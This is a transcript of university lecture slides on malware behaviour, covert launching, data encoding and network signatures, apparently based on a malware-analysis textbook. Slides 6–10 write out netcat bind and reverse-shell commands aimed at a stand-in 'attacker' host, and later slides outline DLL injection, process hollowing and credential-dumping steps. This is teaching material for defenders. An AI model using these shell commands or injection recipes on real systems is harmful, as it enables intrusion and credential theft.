Presentation is loading. Please wait.

Presentation is loading. Please wait.

Part 4: Malware Functionality

Published bySilas Phillips Modified over 6 years ago

Similar presentations

Presentation on theme: "Part 4: Malware Functionality"— Presentation transcript:

1 Part 4: Malware Functionality
Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network Signatures

2 Chapter 11: Malware Behavior

3 Common functionality Downloaders Backdoors Credential stealers
Privilege escalation Covering tracks (rootkits) Persistence mechanisms

4 1. Downloaders Retrieve additional pieces of malware from network to execute Often packaged with an exploit In Windows, API call URLDownloadtoFileA (or BSD socket calls) to download payload Followed by call WinExec to execute 4 4

5 2. Backdoor Malware that provides attacker with remote access to victim machine Most common type of malware Commonly use outgoing port 80 (HTTP) to blend in with other traffic Commonly implement reverse shells (Equifax 2017) Allow attacker to execute commands as if they were on local system Examples: netcat, cmd.exe, remote access tools (a.k.a. RATs) 5 5

6 netcat On computer 1, execute program "echo hello" and redirect output to local netcat server on 8888 Connect to computer 1 at 8888 and redirect output to file foo.txt victim$ echo hello | nc –l 8888 attacker$ nc victim 8888 >foo.txt attacker$ cat foo.txt hello 6 6

7 netcat Backdoor shell listener Connecting to shell
victim$ nc –l 8888 –e /bin/sh attacker$ nc victim 8888 7 7

8 Issues with firewalls and NAT
Or NAT Attacker Victim Connection Attempt X nc victim 8888 nc –l 8888 –e /bin/sh Another good reason why you might want to have an outbound firewall 8 8

9 Shoveling a shell Bypass firewalls and NAT by reversing connection
Have attacker run listener Victim initiates outgoing connection (e.g. IRC, HTTP) Attacker Firewall Victim Connection shovel nc –l –p 8888 nc attacker 8888 –e /bin/sh 9 9

10 But… -e eventually dropped from nc Not a problem…
victim$ mknod /tmp/bpipe p victim$ /bin/bash 0</tmp/bpipe | nc attacker >/tmp/bpipe attacker$ nc –nvlp 8000 10 10

11 Windows reverse shells
cmd.exe equivalent to netcat CreateProcess Create a socket within process Tie stdin, stdout, and stderr of process to socket Multithreaded version in book using CreateThread and CreatePipe 11 11

12 Remote access tools Allow full access to remote administrators
Two methods as before Victim listens for incoming connections from controller (easy to detect, typically blocked) Victim beacons outside controller to receive instructions (harder to detect, not blocked) Example: Poison Ivy 12 12

13 3. Credential Stealers 3 main types Programs that monitor user logins
Programs that dump credentials stored in Windows (e.g. password hashes) that can be attacked off-line Programs that log keystrokes 13 13

14 Monitoring user login Graphical Identification aNd Authentication (GINA) for Windows Login Winlogon process started Winlogon invokes GINA library code (msgina.dll) GINA requests credentials Supports pluggable authentication methods (local accounts, LDAP, Windows Domain auth, Kerberos, etc.) 14 14

15 Example: GINA interception
FakeGINA sits between Winlogon and msgina.dll (Figure 11-2, p. 235, Loc. 5860) Exploits pluggability for supporting other means of authentication Configured to run by setting a Windows registry key HKLM\SOFTWARE\...\Winlogon\GinaDLL set to fsgina.dll Winlogon hijacking winlogon executes fakegina.dll requests credentials fakegina.dll passes credentials to msgina.dll Logout function WlxLoggedOutSAS hooked to store credentials (Listing 11-1, p , Loc. 5874) Original version called first, before rogue code executed 15 15

16 Dumping credentials Password storage Locations of Windows hashes
Typically, only hashes of passwords stored Hash function well-known Dumping hashes allows dictionary attacks since users with weak passwords subject to brute-force dictionary attacks off-line Locations of Windows hashes Security Account Manager (SAM) Local Security Authority Subsystem Service (LSASS) 16 16

17 Example: lsass dumping
pwdump toolkit Performs DLL injection on lsass.exe (Local Security Authority Subsystem Service) Injects rogue DLL lsaext.dll Rogue DLL functions called include GrabHash (Listing 11-2, p. 237, Loc. 5906) Loads library samsrv.dll to get SAM functions SamIConnect, SamrQueryInformationUser, and SamIGetPrivateData Loads library advapi32.dll to get hidden API functions for decrypting credentials (SystemFunction025, SystemFunction027) Must call GetProcAdress to resolve library function locations after they have been loaded at run-time Similar methods used in Pass-the-Hash toolkit 17 17

18 Mimikatz Automated credential stealing on Windows derived from pwdump and PSH toolkits Also hits lsass.exe Included in Metasploit Dumps memory to find Passwords in plaintext Password hashes Kerberos tickets Counter-measures Disable cleartext passwords Use unique administrator account credentials to limit impact of credential theft Put lsass in protected mode (via registry) with a white-list of processes that are allowed access Honey-credentials (e.g. Thinkst Canary)

19 Logging keystrokes Records keystrokes so attacker can observe typed data Kernel-based keyloggers Built into keyboard drivers User-space keyloggers Use Windows API to hook I/O functions (SetWindowsHookEx) or poll for state of keys (GetForegroundWindow and GetAsyncKeyState) Example polling keylogger: (Figure 11-3 and Example 11-4, p. 239, Loc. 5994) Can look for key codes in assembly to identify key loggers 19 19

20 4. Privilege escalation Access to important calls such as TerminateProcess and CreateRemoteThread restricted to administrators But, most users run as local administrators Malware uses privilege escalation for those that don't Exploit vulnerable code to obtain administrator privileges Many malware frameworks include such exploits (e.g. Modify or forge security token of a process Mimikatz "Golden Ticket" for Kerberos 20 20

21 Example: SeDebugPrivilege
Use AdjustTokenPrivileges Initially used as a tool for system-level debugging Use any privilege execution vulnerability to set SeDebugPrivilege in order to get elevated privileges permanently (Listing 11-6, p. 246, Loc. 6172) 21 21

22 5. Covering tracks – rootkits
Hide malicious activity and disable critical functions Most rootkits are kernel-mode to run at the same level as anti-virus/anti-malware 22 22

23 Some rootkit functions
Disable or modify anti-virus process to prevent proper function Disable software updates Hide files, processes, network connections, open file descriptors, resource usage e.g. hide from ls, ps, top, lsof, netstat Modify boot loader Have boot loader apply patches to kernel before loading Modify on-disk kernel Modify boot loader to allow new kernel to pass integrity check Modify registry to install Install hooks on boot via run key in registry Must hide key from anti-virus after installation 23 23

24 Function hooking Mechanism commonly used by rootkits to redirect function calls to injected attack code Replaces legitimate function with alternative one Examples: open, read, close, fstat, lseek, fork, mmap, munmap, calloc, malloc, realloc, valloc, vm_allocate, mach_vm_allocate, mach_vm_map, free, execve 24 24

25 Function hooking Two general methods Function table hooking
Run-time data structures that contain function pointers that are invoked during program execution Hot patching function invocation (inline hooking) Modify JMP/CALL targets in code Modify function prologues to add detour to trampoline 25 25

26 Function table hooking (IAT)
Import Address Table (IAT) used to call functions in libraries Application code push <call parms> call [imp_InternetConnect] InternetConnect() push ebp lea ebp, [esp+var_5 8] sub esp, 29Ch Import Address Table jmp InternetConnect jmp InternetAutodial jmp InternetErrorDlg 26 26

27 IAT hooking Modify IAT to hijack a DLL call x
Load rootkit hook function into memory Replace target function’s address in the IAT with address of hook function Hook function invokes original function Figure 11-4, p. 247, Loc. 6226 Application code push <call parms> call [imp_InternetConnect] InternetConnect() push ebp lea ebp, [esp+var_5 8] sub esp, 29Ch Import Address Table jmp InternetConnect jmp InternetAutodial jmp InternetErrorDlg x Rootkit Code 27 27

28 IAT hooking Details in book… Locate import section from IAT
Find IMAGE_IMPORT_DESCRIPTOR chunk of DLL that exports that function Locate IMAGE_THUNK_DATA which holds original address of imported function Replace address in IAT to point to your function and have your function eventually call the original 28 28

29 IAT hooking Detection problems Legitimate hooking common
Methods such as DLL forwarding makes benign vs. malicious hooks hard to discern Late binding of IAT Function addresses sometimes not resolved until called Reduces amount of initial overhead But, won’t know what the legitimate values should be! 29 29

30 Example IAT targets DLLs commonly used at run-time Other DLLs
kernel32.dll, user32.dll, gui32.dll, advapi.dll kernel32 loaded into private address space between 0x and 0x7FFE0000 Example: Hiding files in a directory Replace FindFirstFile(), FindNextFile() in kernel32 to skip rootkit files Other DLLs DirectX/OpenGL APIs and time functions Typically hooked to implement cheating in on-line games Winsock API Hooked to monitor network traffic 30 30

31 Example library hook Hook keyboard/DirectInput APIs to obtain keyboard/mouse events GetKeyboardState(), GetKeyState(), GetDeviceState(), etc. SHORT WINAPI FakeGetAsyncKeyState(int vKey) { SHORT nResult = 0; if (g_bNeedMP) { if (vKey == VK_M) { nResult |= 0x8000; //’M’ pressed g_bNeedMP = FALSE; } else nResult = RealGetAsyncKeyState(vKey); //... return nResult; 31 31

32 Library hooks in Linux Late binding and linking via function pointer table Link upon first invocation of the function by program Avoids linking a function that a program does not call, avoids linking all functions at load time Two data structures Global Offset Table (GOT) Array for storing addresses of library functions Uninitialized at start of program Each entry instead points to code that invokes linker (to resolve address upon first invocation of function) Linker then replaces itself with actual function address for subsequent invocations of the function Procedure link table (PLT) Code in .text section that invokes both the linker and the library function being called

33 PLT homework: Corrupt GOT to hijack execution
GOT[0]: addr of .dynamic GOT[1]: addr of reloc entries GOT[2]: addr of dynamic linker GOT[3]: 0x4005b6 # sys startup GOT[4]: 0x4005c6 # printf()=>plt GOT[5]: 0x4005d6 # exit()=>plt Global offset table (GOT) Data segment GOT[0]: addr of .dynamic GOT[1]: addr of reloc entries GOT[2]: addr of dynamic linker GOT[3]: 0x4005b6 # sys startup GOT[4]: &printf() GOT[5]: 0x4005d6 # exit() Global offset table (GOT) Data segment Code segment callq 0x4005c0 # call printf() callq 0x4005c0 # call printf() Code segment # PLT[0]: call dynamic linker 4005a0: pushq *GOT[1] 4005a6: jmpq *GOT[2] # PLT[2]: call printf() 4005c0: jmpq *GOT[4] 4005c6: pushq $0x1 4005cb: jmpq 4005a0 Procedure linkage table (PLT) 1 1 Procedure linkage table (PLT) 3 # PLT[0]: call dynamic linker 4005a0: pushq *GOT[1] 4005a6: jmpq *GOT[2] # PLT[2]: call printf() 4005c0: jmpq *GOT[4] 4005c6: pushq $0x1 4005cb: jmpq 4005a0 4 To linker 2 To printf 2 PLT homework: Corrupt GOT to hijack execution

34 Hot-patching invocation (Detours)
Library developed by Microsoft in 1999 G. Hunt, D. Brubacker, “Detours: Binary Interception of Win32 Functions”, 3rd USENIX Windows NT Symposium, July 1999. Instrument and extend existing OS and application functionality simply A programmer-friendly “feature” of Windows to easily patch functions Avoids modification of function pointer tables which can be detected by anti-virus/anti-rootkit technology Detours modify function in-line 34 34

35 Mechanism Save initial instructions of function at the entry point
Original bytes of function saved in trampoline Inject code (detour) to redirect execution to interceptor function (trampoline) Done by inserting jump instruction into function where original bytes were Trampoline Implements 5 replaced bytes of original function Implements the function you want to execute jmps back to original target function plus 5 35 35

36 Detour details 5-byte function preamble replaced by jmp
Replaced instructions moved to trampoline Microsoft intentionally changed preamble to support Before XP push ebp 8bec mov ebp, esp Hard to hook since you must disassemble user code to insert detour After XP 8bff mov edi, edi Easy to hook, exactly 5 bytes Makes hot patches easy 36 36

37 Rest of original function
Detour details Must know which OS is being used Must ensure no one else has patched the function already Must save the instructions being removed by detour Must ensure code reachable via a relative FAR JMP instruction target calculated at run-time FAR JMP Rest of original function Rootkit code Removed instructions FAR JMP 37 37

38 Detour details More powerful than IAT hooking
Do not have problems with binding time Ensures hook is not overwritten by application IAT (PLT in Linux) calculated upon first invocation Functions appearing in multiple tables are handled in one step Code runs no matter how the function is called Can be used for both kernel and user functions 38 38

39 Malware and detours Commonly used to add malicious functions into existing binaries on disk Adds a new .detour section into PE structure and modifies import address table using setdll tool in Detours library Targets include authentication check, DRM checks, anti-virus code, file system scans 39 39

40 Detour example Modify ZwDeviceIoControlFile to hide ports
Listing 11-7, p. 248, Loc. 6237: Get pointer to code location of function to insert hook into eax Table 11-2, p. 248, Loc. 6253: Define “hook byte” template (detour) Copy address of hooking function into template (memcpy) into 0x Listing 11-8, p. 249, Loc. 6272: Call to install hook bytes at 0x into ZwDeviceIoControlFile call Note: Hook bytes can be installed deep into function to avoid detection 40 40

41 Mac OS Similar mechanisms, different names
Stephanie Archibald, “Sierra Had A Little Lamb”, INFILTRATE 2017 Alternative OS X hooks NSCreateObjectFileImageFromMemory NSLinkModule

42 6. Persistence mechanisms
Methods to ensure survival of malware on a system Windows Registry persistence Trojaning DLL load-order hijacking, DLL side-loading 42 42

43 Windows registry persistence
Common key malware targets HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run + dozens more related to startup process AppInit_DLLs Loaded into every process that loads User32.dll Stored in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Space delimited string of DLLs to load upon application invocation 43 43

44 Windows registry persistence
Common key malware targets Winlogon Hooking logged events (logon, logoff, startup, shutdown, lock screen) \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ When winlogon.exe generates an event, Windows checks the Notify registry key above for a DLL that will handle it SvcHost DLLs All services persist via registry svchost.exe – generic host process for services that run from DLLs \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost \HKLM\System\CurrentControlSet\Services\ServiceName 44 44

45 Trojaning Malware patches binary or library to add its functionality
Example: Nimda, Bliss Append code in existing section or in new section Change entry point to point to virus code Virus returns to target program after execution 45 45

46 Trojaning using the ELF header
typedef struct { unsigned char e_ident[EI_NIDENT]; Elf32_Half e_type; Elf32_Half e_machine; Elf32_Word e_version; Elf32_Addr e_entry; Elf32_Off e_phoff; Elf32_Off e_shoff; Elf32_Word e_flags; Elf32_Half e_ehsize; Elf32_Half e_phentsize; Elf32_Half e_phnum; Elf32_Half e_shentsize; Elf32_Half e_shnum; Elf32_Half e_shstrndx; } Elf32_Ehdr; “This member gives the virtual address to which the system first transfers control, thus starting the process” We can change this to point elsewhere (not main() ) 46 46

47 Trojaning DLLs DllEntryPoint function tampering
Change code at entry to jump immediately to malicious code Malicious code performs pusha to save all registers in one instruction Malicious code performs popa to restore all registers before returning back to legitimate code Example Table 11-1, Listing 11-5, p. 243, Loc. 6085 Insert detour Invoke code to force LoadLibrary of msconf32.dll Note: call followed by pop to get pointer to msconf32.dll string Original instructions from entry point executed after popa before jumping back to original code 47 47

48 Trojaning DLLs DLL load-order hijacking
DLL search path in Windows XP (similar to LD_LIBRARY_PATH in Linux) Directory from which application was loaded Current directory System directory (GetSystemDirectory function) 16-bit system directory Windows directory (GetWindowsDirectory function) Directories in PATH environment variable Rename malicious library and place high in path 48 48

49 Example

50 Trojaning DLLs DLL side-loading Counter-measures Windows SxS
Windows feature for DLL versioning issues Allow multiple versions of DLL to exist in filesystem "side-by-side" Choose the one used based on the version the application needs Malware replaces version being used (which may not be visible in the file system) Counter-measures Application manifests with library integrity checks to validate DLL imports 50 50

51 In-class exercise Lab 11-1 51 51

52 Chapter 12: Covert Malware Launching
52 52

53 Covert Launching Methods
Launchers Process Injection Process Replacement Hook Injection Detours APC Injection 53 53

54 1. Launchers Malware that sets itself up for immediate or future covert execution Often contain malware that is to be executed in a resource section See previous Lab 11-01 Uses FindResource, LoadResource, and SizeofResource API calls to extract 54 54

55 2. Process injection Inject code into another running process
Bypasses host-based firewalls and process-specific security mechanisms Force process to call VirtualAllocEx, then WriteProcessMemory to inject code Two injection types: DLL injection, direct injection 55 55

56 DLL injection Force remote process to load a malicious DLL
Most common covert loading technique Remotely inject code into process that calls LoadLibrary OS automatically executes DllMain of newly loaded libraries All actions appear to originate from compromised process Figure 12-1, p. 255, Loc. 6380 56 56

57 DLL injection into running process
Part of the “idea” behind these features was accessibility tools 57 57

58 DLL injection Method #1 CreateToolhelp32Snapshot, Process32First, Process32Next API calls to search process list for victim Get PID of victim and use OpenProcess to obtain handle Allocate space for name of malicious DLL in victim process VirtualAllocEx allocates space in remote process given handle Call WriteProcessMemory to write string into victim process where VirtualAllocEx obtained space Call CreateRemoteThread to start a new thread in victim lpStartAddress : starting address of thread (set to address of LoadLibrary) lpParameter : argument for thread (point to above memory that stores name of malicious DLL Listing 12-1, Figure 12-2, p , Loc. 6403, 6423 J. Richter, “Load Your 32-bit DLL into Another Process’s Address Space Using INJLIB”, Microsoft Systems Journal/9 No. 5 58 58

59 DLL injection Preserving original functionality Example tool
Still need original functions to work correctly Injected DLL often set up to call original DLL to support desired functionality Interposed between application and real DLL Example tool Inject.exe (Aphex) C:\> inject.exe winlogon “myrootkit.dll” 59 59

60 DLL injection Method #2 using Windows Debug API
Attacker must have Debug programs rights on system Attach debugger to process Break when you want to inject Analyze PE header to find a usable, writable part of memory for code ReadProcessMemory to save code that is there WriteProcessMemory to write injection code that loads a DLL into memory space Include INT 3 at end of injection code for debugger to stop Set EIP to start of injection code and continue Breaks when DLL loaded, restore original state of memory (i.e. remove code to inject DLL) Even easier with a code cave (no need to save memory) 60 60

61 Communications Technology Lab
Code cave example Code cave Communications Technology Lab 61 61

62 Direct code injection Similar to DLL injection, but write all code into victim process directly No DLL Requires custom code that will not disrupt victim process Often used to inject shellcode Mechanism Allocate space for new thread’s data and code Write data and code Create new thread pointing to injected code VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread 62 62

63 3. Process replacement Overwrite memory space of running process with malicious executable Also known as process hollowing, memory-only implants Allows for almost “file-less” persistence Disguise malware without risking crashes from partial injection 63 63

64 Example In assembly In C svchost.exe Start svchost in suspended state
Pass CREATE_SUSPENDED as the dwCreationFlags parameter when calling CreateProcess Listing 12-2, p. 258, Loc. 6460 In C Release all memory using ZwUnmapViewOfSection Allocate memory for malicious code via VirtualAllocEx WriteProcessMemory to write malware sections SetThreadContext to fix entry point to point to malicious code ResumeThread to initiate malware Bypasses firewalls and intrusion prevention systems since svchost runs many network daemons Listing 12-3, p. 258, Loc. 6479 64 64

65 Example Kovter (2016) Click-fraud trojan whose code is now used for ransomware Delivered via phishing Malicious JavaScript that hides across several registry keys Payload adds itself to startup process and performs process hollowing on regsvr32.exe 65 65

66 4. Hook injection Interpose malware using Windows hooks Types of hooks
Hooks used to handle messages and events going to/from applications and operating system Figure 12-3, p. 259, Loc. 6502 Use malicious hooks to run certain code whenever a particular message is intercepted (i.e. keystrokes) Use malicious hooks to ensure a particular DLL is loaded in a victim's memory space (i.e. process loaded event) Types of hooks Local hooks: observe and manipulate messages internally within process Remote hooks: observe and manipulate messages destined for a remote process 66 66

67 Hook examples Keyboard hooks Windows hooks Targeting threads
Registering hook code using WH_KEYBOARD or WH_KEYBOARD_LL hook procedure types to implement keyloggers Windows hooks Register hook with SetWindowsHookEx to capture window events Targeting threads Hooks must determine which thread to attach to Malware implements code to get dwThreadId of victim Hook targets often obscure to evade Intrusion Prevention Systems WH_CBT hook for computer-based training messages Call SetWindowsHookEx to install hook on remote thread Then, initiate WH_CBT message to force load Listing 12-4, p. 261, Loc. 6545 67 67

68 5. Detours See previous chapter Example: MigBot
PEView of detour Figure 12-4, p. 262, Loc. 6580 Example: MigBot Detours two kernel functions: NtDeviceIoControlFile and SeAccessCheck Both are exported and have entries in the PE header 68 68

69 6. APC injection APC = Asynchronous Procedure Call Two forms
Malware using CreateRemoteThread easily detected APC allows for a stealthier way to execute code Each thread has an APC function queue attached to it Threads execute all functions in APC queue when in an alertable state (i.e. swapped out) e.g. after calls to WaitForSingleObjectEx, WaitForMultipleObjectsEx, and SleepEx Malware performs APC injection to preempt threads in an alertable state to get immediate execution of their code Two forms Kernel-mode: APC generated for the system or a driver User-mode: APC generated for an application 69 69

70 APC injection from user space
One thread can queue a function to be invoked in another via API call QueueUserAPC WaitForSingleObjectEx is the most common call to the Windows API Listing 12-5, p , Loc. 6619 OpenThread followed by QueueUserAPC using LoadLibraryA on a malicious DLL (dbnet.dll) Note: calls to CreateToolhelp32Snapshot or ZwQuerySystemInformation, Process32First, Process32Next, Thread32First, and Thread32Next usually precede this snippet 70 70

71 APC injection from kernel space
Malicious drivers in kernel often would like to execute code in user space Listing 12-6, p. 264, Loc. 6646 Kernel code to inject an APC into user space 71 71

72 In-class exercise Lab 12-1, 12-3 72 72

73 Chapter 13: Data Encoding
73 73

74 Data Encoding Goal Defeat signature-detection by obfuscating malicious content Encrypt network communication Hide command and control location Hide staging file before transmission Hide from “strings” analysis 74 74

75 Data Encoding methods 1. Simple Ciphers 2. Common Cryptographic Algorithms 3. Custom Encoding 4. Decoding 75 75

76 1. Simple ciphers Substituation ciphers XOR Shift/Rotate characters
Bit-wise XOR of data with a fixed byte or generated byte stream Figure 13-1, p. 271, Loc. 6762 For a fixed byte XOR, can brute force all 256 values to find a PE header (MZ) (Table 13-1, Listing 13-2, p , Loc 6795, 6825) Can build a signature on all 256 XORs of a fixed part of file (Table 13-2, p. 273, Loc. 6839) Some malware uses null-preserving XOR to make detection less obvious 0x12 opcodes everywhere in Listing 13-1 Then Listing 13-3, p. 274, Loc. 6863 Decoding loops easy to identify via searching for xor opcode Figure 13-2, p. 275, Loc. 6894 76 76

77 Simple ciphers Base-64 From MIME standard
Represents binary data in an ASCII string format Binary data converted into one of 64 primary characters [a-zA-Z0-9+/] with = used for padding Every 3-bytes of binary data is encoded in 4-bytes of Base64 (Figure 13-4, p. 277, Loc. 6968) Example: 3 byte binary = 4 byte Base64 = TWFu A B C D E F G H I J 10 K L M N O P Q R S T 20 U V W X Y Z a b c d 30 e f g h i j k l m n 40 o p q r s t u v w x 50 y z / 77 77

78 Simple ciphers Base-64 decoding
Look for a string used as an index table ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz / Try on-line conversion tools Caution: Malware can easily modify index table to create custom substitution ciphers very easily (see book example) 78 78

79 2. Cryptographic ciphers
Drawbacks Crypto libraries are large and easily detected Must hide the key for symmetric encryption algorithms Recognizing encrypted code Imports include well-known OpenSSL or Microsoft functions (Figure 13-9, p. 282, Loc. 7058) Use of cryptographic constants DES constants found by FindCrypt2 plugin in IDA Pro (Figure 13-10, p. 282, Loc. 7079) Or both Krypto ANALyzer plugin for PEiD (Figure 13-11, p. 283, Loc. 7085) 79 79

80 Cryptographic ciphers
Recognizing encrypted data Some malware employs crypto algorithms that do not have constants (RC4, IDEA generate at run-time) or do not rely on libraries Must search for high-entropy content IDA Pro Entropy Plugin (Figure 13-12, 13-13, p. 284, 285, Loc. 7110, 7125) 80 80

81 3. Custom encoding Look for hints
Trace execution to see suspicious activity in a tight loop Example: pseudo-random number generation followed by xor (Figure 13-14, p. 287, Loc. 7174) 81 81

82 4. Decoding Self-decoding malware Malware employing decoding functions
Malware packaged with decoding routine Tell-tale sign: strings that don't appear in binary file on disk, but appear in debugger Decrypt by setting a breakpoint directly after decryption routine finishes execution Malware employing decoding functions Can sometimes use standard libraries to decode Python's base64.decodestring() or PyCrypto's functions (Listing 13-7, 13-8, 13-9, p. 289) Or programmatically use debugger to re-run malware’s decoding code with chosen parameters ImmDbg Python example in textbook 82 82

83 In-class exercise Lab 13-1 83 83

84 Chapter 14: Malware-Focused Network Signatures
84 84

85 Networking and Malware
Network Countermeasures Safely Investigating an Attacker Online Content-Based Network Countermeasures Combining Dynamic and Static Analysis Techniques Understanding the Attacker's Perspective 85 85

86 1. Network Countermeasures
IP connectivity Restrict network access using routers and firewalls DNS Reroute known malicious domains to an internal host (sinkhole) Content-filters Proxies, intrusion detection systems, intrusion prevention systems for intercepting web requests in order to detect or prevent access 86 86

87 Network Countermeasures
Mine logs, alerts, and packet captures for forensic information No risk of infection when performing post-mortem analysis versus actively attempting to run malware Malware can be programmed to detect active analysis Indications of malicious activity Beacons to malicious sites, especially if done without DNS query 87 87

88 2. Safely Investigating an Attacker Online
Indirection Use network anonymizers such as Tor to hide yourself Use a virtual machine and virtual networks running through remote infrastructure (cellular, Amazon EC2, etc) Open-source Intelligence Collect IP address and DNS information on suspicious activity See Regional Internet Registries to find out organizational assignment of IP blocks Query whois records of DNS names to find contact information metadata (domaintools.com) Recon slides in CS 410/510: Web Security class, recon-ng in Kali Caution Attacker can bind payload to victim and disappear if something is amiss when you connect 88 88

89 3. Content-Based Network Counter-Measures
Intrusion Detection with Snort Rules that link together elements that must be true to fire Size of payload, flag fields, specific settings of TCP/IP headers, HTTP headers, content in payload Table 14-1, p. 299, Loc. 7470: Wefa7e's HTTP User-Agent Potential Snort rule to detect Wefa7e p. 303, Loc. 7568 But, variants of malware will tweak User-Agent But…what if? p. 306, Loc. 7660 Could use regexps to modify rule, but not a tenable approach in general Malware intentionally generating false positives 89 89

90 4. Combining Dynamic and Static Analysis Techniques
Steganography in protocols Attackers mimicking typical web requests Encoding commands in URLs and HTTP headers Encoding commands in meta-data of web pages Malware circumventing intrusion detection filters similar to Tor circumventing censorship filters 90 90

91 4. Combining Dynamic and Static Analysis Techniques
Behavioral analysis Finding networking code to develop signatures WinSock API (WSAStartup, getaddrinfo, socket, connect, send, recv, WSAGetLastError) WinINet API (InternetOpen, InternetConnect, InternetOpenURL, InternetReadFile, InternetWriteFile, HTTPOpenRequest, HTTPQueryInfo, HTTPSendRequest) COM interface (URLDownloadToFile, CoInitialize, CoCreateInstance, Navigate) Finding hard-coded patterns or stable content to create rules Reverse-engineering encoding or decoding scheme allows for accurate network signature generation 91 91

92 5. Understanding the Attacker’s Perspective
Attackers will mutate payloads to avoid detection Focus on elements that are part of both endpoints Focus on elements of protocol known to be part of a key (see above) Operate at a level that is different than other defenders (so that an attacker side-stepping another filter will not affect yours) Defense-in-depth 92 92

93 In-class exercise Lab 14-1 93 93

Download ppt "Part 4: Malware Functionality"

Similar presentations

Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
Operating System Security : David Phillips A Study of Windows Rootkits.

Operating System Security : David Phillips A Study of Windows Rootkits.
Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network.

Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network.
RIVERSIDE RESEARCH INSTITUTE Helikaon Linux Debugger: A Stealthy Custom Debugger For Linux Jason Raber, Team Lead - Reverse Engineer.

RIVERSIDE RESEARCH INSTITUTE Helikaon Linux Debugger: A Stealthy Custom Debugger For Linux Jason Raber, Team Lead - Reverse Engineer.
Operating-System Structures

Operating-System Structures
1 Code/DLL Injection ECE4112 – Internetwork Security Georgia Institute of Technology By Andrei Bersatti and Brandon Harrington.

1 Code/DLL Injection ECE4112 – Internetwork Security Georgia Institute of Technology By Andrei Bersatti and Brandon Harrington.
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Part 4: Malware Functionality

Part 4: Malware Functionality
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
APT29 HAMMERTOSS Jayakrishnan M.

APT29 HAMMERTOSS Jayakrishnan M.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
CIS 450 – Network Security Chapter 16 – Covering the Tracks.

CIS 450 – Network Security Chapter 16 – Covering the Tracks.
Part 3: Advanced Dynamic Analysis Chapter 8: Debugging.

Part 3: Advanced Dynamic Analysis Chapter 8: Debugging.
Chapter 2: Operating-System Structures. 2.2 Silberschatz, Galvin and Gagne ©2005 Operating System Concepts Chapter 2: Operating-System Structures Operating.

Chapter 2: Operating-System Structures. 2.2 Silberschatz, Galvin and Gagne ©2005 Operating System Concepts Chapter 2: Operating-System Structures Operating.
Implementing a Port Knocking System in C Honors Thesis Defense by Matt Doyle.

Implementing a Port Knocking System in C Honors Thesis Defense by Matt Doyle.
Virus Detection Mechanisms Final Year Project by Chaitanya kumar CH K.S. Karthik.

Virus Detection Mechanisms Final Year Project by Chaitanya kumar CH K.S. Karthik.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
Christopher Kruegel University of California Engin Kirda Institute Eurecom Clemens Kolbitsch Thorsten Holz Secure Systems Lab Vienna University of Technology.

Christopher Kruegel University of California Engin Kirda Institute Eurecom Clemens Kolbitsch Thorsten Holz Secure Systems Lab Vienna University of Technology.
Homework tar file Download your course tarball from web page – Named using your PSU ID – Chapter labeled for each binary.

Homework tar file Download your course tarball from web page – Named using your PSU ID – Chapter labeled for each binary.

Similar presentations

Ads by Google